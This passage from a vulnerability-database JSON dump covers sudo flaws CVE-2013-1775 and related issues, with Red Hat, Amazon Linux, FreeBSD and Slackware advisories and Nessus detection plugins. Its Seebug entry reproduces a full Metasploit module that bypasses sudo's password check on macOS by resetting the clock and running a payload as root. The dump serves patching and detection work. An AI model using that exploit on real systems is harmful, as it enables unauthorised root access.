(BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers\nfile correctly if it contained an Active Directory (AD) group. The\nfile was parsed only up to the first AD group information and then the\nparsing failed with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly. 
(BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary\nauthentication mechanism, users were not able to authenticate on that\nsystem. With this update, sudo has been modified to process LDAP and\nAD names correctly and the authentication process now works as\nexpected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly\nparsed certain alias definitions. Consequently, an error message was\nissued. The bug has been fixed, and parsing errors no longer occur\nwhen using 'visudo -s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.", "edition": 20, "published": "2013-10-01T00:00:00", "title": "RHEL 5 : sudo (RHSA-2013:1353)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "modified": "2013-10-01T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:sudo-debuginfo", "p-cpe:/a:redhat:enterprise_linux:sudo"], "id": "REDHAT-RHSA-2013-1353.NASL", "href": "https://www.tenable.com/plugins/nessus/70249", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1353. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70249);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_bugtraq_id(58203, 58207);\n script_xref(name:\"RHSA\", value:\"2013:1353\");\n\n script_name(english:\"RHEL 5 : sudo (RHSA-2013:1353)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated sudo package that fixes multiple security issues and\nseveral bugs is now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. 
(CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the\n/etc/sudoers file as cycles. Consequently, a warning message about\nundefined aliases appeared. This bug has been fixed, /etc/sudoers is\nnow parsed correctly by visudo and the warning message no longer\nappears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers\nfile correctly if it contained an Active Directory (AD) group. The\nfile was parsed only up to the first AD group information and then the\nparsing failed with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary\nauthentication mechanism, users were not able to authenticate on that\nsystem. With this update, sudo has been modified to process LDAP and\nAD names correctly and the authentication process now works as\nexpected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly\nparsed certain alias definitions. Consequently, an error message was\nissued. The bug has been fixed, and parsing errors no longer occur\nwhen using 'visudo\n\n* s'. 
(BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:1353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2776\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected sudo and / or sudo-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/01\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:1353\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"sudo-debuginfo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"sudo-debuginfo-1.7.2p1-28.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"sudo-debuginfo-1.7.2p1-28.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-debuginfo\");\n }\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:18:39", "description": "A flaw was found in the way sudo handled time stamp 
files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-2776 , CVE-2013-2777)", "edition": 24, "published": "2013-12-14T00:00:00", "title": "Amazon Linux AMI : sudo (ALAS-2013-259)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-2777", "CVE-2013-2776"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:sudo", "p-cpe:/a:amazon:linux:sudo-devel", "p-cpe:/a:amazon:linux:sudo-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2013-259.NASL", "href": "https://www.tenable.com/plugins/nessus/71399", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2013-259.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71399);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-2776\", \"CVE-2013-2777\");\n script_xref(name:\"ALAS\", value:\"2013-259\");\n script_xref(name:\"RHSA\", value:\"2013:1701\");\n\n script_name(english:\"Amazon Linux AMI : sudo (ALAS-2013-259)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw 
was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-2776 , CVE-2013-2777)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2013-259.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update sudo' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:sudo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/12/11\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"sudo-1.8.6p3-12.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"sudo-debuginfo-1.8.6p3-12.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"sudo-devel-1.8.6p3-12.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-debuginfo / sudo-devel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:39", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775"], "description": "\nTodd Miller reports:\n\nThe 
flaw may allow someone with physical access to a machine that\n\t is not password-protected to run sudo commands without knowing the\n\t logged in user's password. On systems where sudo is the principal\n\t way of running commands as root, such as on Ubuntu and Mac OS X,\n\t there is a greater chance that the logged in user has run sudo\n\t before and thus that an attack would succeed.\n\n", "edition": 4, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "764344FB-8214-11E2-9273-902B343DEEC9", "href": "https://vuxml.freebsd.org/freebsd/764344fb-8214-11e2-9273-902b343deec9.html", "title": "sudo -- Authentication bypass when clock is reset", "type": "freebsd", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T15:22:26", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Mac OS X Sudo Password Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-81531", "id": "SSV:81531", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n#\r\n# http://metasploit.com/\r\n##\r\nrequire 'shellwords'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n\r\n # ManualRanking because it's going to modify system time\r\n # Even when it will try to restore things, user should use\r\n # it at his own risk\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n SYSTEMSETUP_PATH = "/usr/sbin/systemsetup"\r\n SUDOER_GROUP = "admin"\r\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\r\n\r\n # saved clock config\r\n attr_accessor :time, :date, :networked, :zone, :network_server\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Mac OS X Sudo Password Bypass',\r\n 'Description' => %q{\r\n This module gains a session with root permissions on versions of OS X with\r\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\r\n and possibly lower versions.\r\n\r\n If your session belongs to a user with Administrative Privileges\r\n (the user is in the sudoers file and is in the "admin group"), and the\r\n user has ever run the "sudo" command, it is possible to become the super\r\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\r\n\r\n This module will fail silently if the user is not an admin or if the user has never\r\n run the sudo command.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Todd C. 
Miller', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # Metasploit module\r\n 'juan vazquez' # testing/fixing module bugs\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1775' ],\r\n [ 'OSVDB', '90677' ],\r\n [ 'BID', '58203' ],\r\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\r\n ],\r\n 'Platform' => 'osx',\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Mac OS X x64 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86_64\r\n }\r\n ],\r\n [ 'CMD',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 28 2013'\r\n ))\r\n register_advanced_options([\r\n OptString.new('TMP_FILE',\r\n [true,'For the native targets, specifies the path that '+\r\n 'the executable will be dropped on the client machine.',\r\n '/tmp/.<random>/<random>']\r\n ),\r\n ], self.class)\r\n end\r\n\r\n # ensure target is vulnerable by checking sudo vn and checking\r\n # user is in admin group.\r\n def check\r\n if cmd_exec("sudo -V") =~ /version\\s+([^\\s]*)\\s*$/\r\n sudo_vn = $1\r\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\r\n # check vn between 1.6.0 through 1.7.10p6\r\n # and 1.8.0 through 1.8.6p6\r\n if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\r\n print_error "sudo version #{sudo_vn} not vulnerable."\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_error "sudo not detected on the system."\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if not user_in_admin_group?\r\n print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."\r\n Exploit::CheckCode::Safe\r\n end\r\n # one root for you sir\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if not user_in_admin_group?\r\n 
fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.")\r\n end\r\n # "remember" the current system time/date/network/zone\r\n print_good("User is an admin, continuing...")\r\n\r\n # drop the payload (unless CMD)\r\n if using_native_target?\r\n cmd_exec("mkdir -p #{File.dirname(drop_path)}")\r\n write_file(drop_path, generate_payload_exe)\r\n register_files_for_cleanup(drop_path)\r\n cmd_exec("chmod +x #{[drop_path].shelljoin}")\r\n print_status("Payload dropped and registered for cleanup")\r\n end\r\n\r\n print_status("Saving system clock config...")\r\n @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]\r\n @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]\r\n @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)\r\n @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]\r\n @network_server = if @networked\r\n cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]\r\n end\r\n\r\n run_sudo_cmd\r\n end\r\n\r\n def cleanup\r\n print_status("Resetting system clock to original values") if @time\r\n cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?\r\n cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?\r\n cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?\r\n\r\n if @networked\r\n cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")\r\n unless @network_server.nil?\r\n cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")\r\n end\r\n end\r\n\r\n print_good("Completed clock reset.") if @time\r\n end\r\n\r\n private\r\n\r\n def run_sudo_cmd\r\n print_status("Resetting user's time stamp file and setting clock to the epoch")\r\n cmd_exec(\r\n "sudo -k; \\n"+\r\n "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+\r\n " -setdate 01:01:1970 -settime 00:00"\r\n )\r\n\r\n # Run 
Test\r\n test = rand_text_alpha(4 + rand(4))\r\n sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')\r\n\r\n print_status("Testing that user has sudoed before...")\r\n output = cmd_exec('echo "" | ' + sudo_cmd_test)\r\n\r\n if output =~ /incorrect password attempts\\s*$/i\r\n fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")\r\n elsif output =~ /#{test}/\r\n print_good("Test executed succesfully. Running payload.")\r\n else\r\n print_error("Unknown fail while testing, trying to execute the payload anyway...")\r\n end\r\n\r\n # Run Payload\r\n sudo_cmd_raw = if using_native_target?\r\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\r\n elsif using_cmd_target?\r\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\r\n end\r\n\r\n ## to prevent the password prompt from destroying session\r\n ## backgrounding the sudo payload in order to keep both sessions usable\r\n sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'\r\n\r\n print_status "Running command: "\r\n print_line sudo_cmd\r\n output = cmd_exec(sudo_cmd)\r\n\r\n end\r\n\r\n # helper methods for accessing datastore\r\n def using_native_target?; target.name =~ /native/i; end\r\n def using_cmd_target?; target.name =~ /cmd/i; end\r\n def drop_path\r\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\r\n end\r\n\r\n # checks that the user is in OSX's admin group, necessary to change sys clock\r\n def user_in_admin_group?\r\n cmd_exec("groups `whoami`").split(/\\s+/).include?(SUDOER_GROUP)\r\n end\r\n\r\n # helper methods for dealing with sudo's vn num\r\n def parse_vn(vn_str); vn_str.split(/[\\.p]/).map(&:to_i); end\r\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\r\n vn_parts = parse_vn(vn)\r\n ranges.any? do |range|\r\n min_parts = parse_vn(range[0])\r\n max_parts = parse_vn(range[1])\r\n vn_parts.all? 
do |part|\r\n min = min_parts.shift\r\n max = max_parts.shift\r\n (min.nil? or (not part.nil? and part >= min)) and\r\n (part.nil? or (not max.nil? and part <= max))\r\n end\r\n end\r\n end\r\n\r\nend\n ", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-81531"}], "slackware": [{"lastseen": "2019-05-30T07:37:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "New sudo packages are available for Slackware 12.1, 12.2, 13.0, 13.1, 13.37,\n14.0, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.0 ChangeLog:\n\npatches/packages/sudo-1.8.6p7-i486-1_slack14.0.txz: Upgraded.\n This update fixes security issues that could allow a user to run commands\n without authenticating after the password timeout has already expired.\n Note that the vulnerability did not permit a user to run commands other\n than those allowed by the sudoers policy.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1776\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/sudo-1.7.10p7-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/sudo-1.7.10p7-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/sudo-1.7.10p7-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/sudo-1.7.10p7-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/sudo-1.7.10p7-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/sudo-1.7.10p7-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/sudo-1.7.10p7-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/sudo-1.7.10p7-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/sudo-1.8.6p7-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/sudo-1.8.6p7-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.8.6p7-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/sudo-1.8.6p7-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.1 package:\n16e47202f5cda7a372639fa6ef304974 
sudo-1.7.10p7-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n6428965e88cac3b36a84bd3b1ab361a2 sudo-1.7.10p7-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\n0251ce11992c06ba0e55a2a3f2e79d28 sudo-1.7.10p7-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n5352a19dbfdaad232573f4beb1b1237a sudo-1.7.10p7-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n977a8fb54ae46ceaa037b52234f2bc2a sudo-1.7.10p7-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n4182726dc8cb4ba5b69a46daed686d04 sudo-1.7.10p7-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n1af20762e5895338f38787e8f493d517 sudo-1.7.10p7-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n1af6f706de63704630087e1da3721ad7 sudo-1.7.10p7-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nd611a1f15bb379d078e04646172a626c sudo-1.8.6p7-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n580351ec41716ce1955468dbfaf95892 sudo-1.8.6p7-x86_64-1_slack14.0.txz\n\nSlackware -current package:\nffb4636d9f772f441925079c4312a1fc ap/sudo-1.8.6p7-i486-1.txz\n\nSlackware x86_64 -current package:\n66fa0b6eefbd9937ce7b4ac5e8c133c6 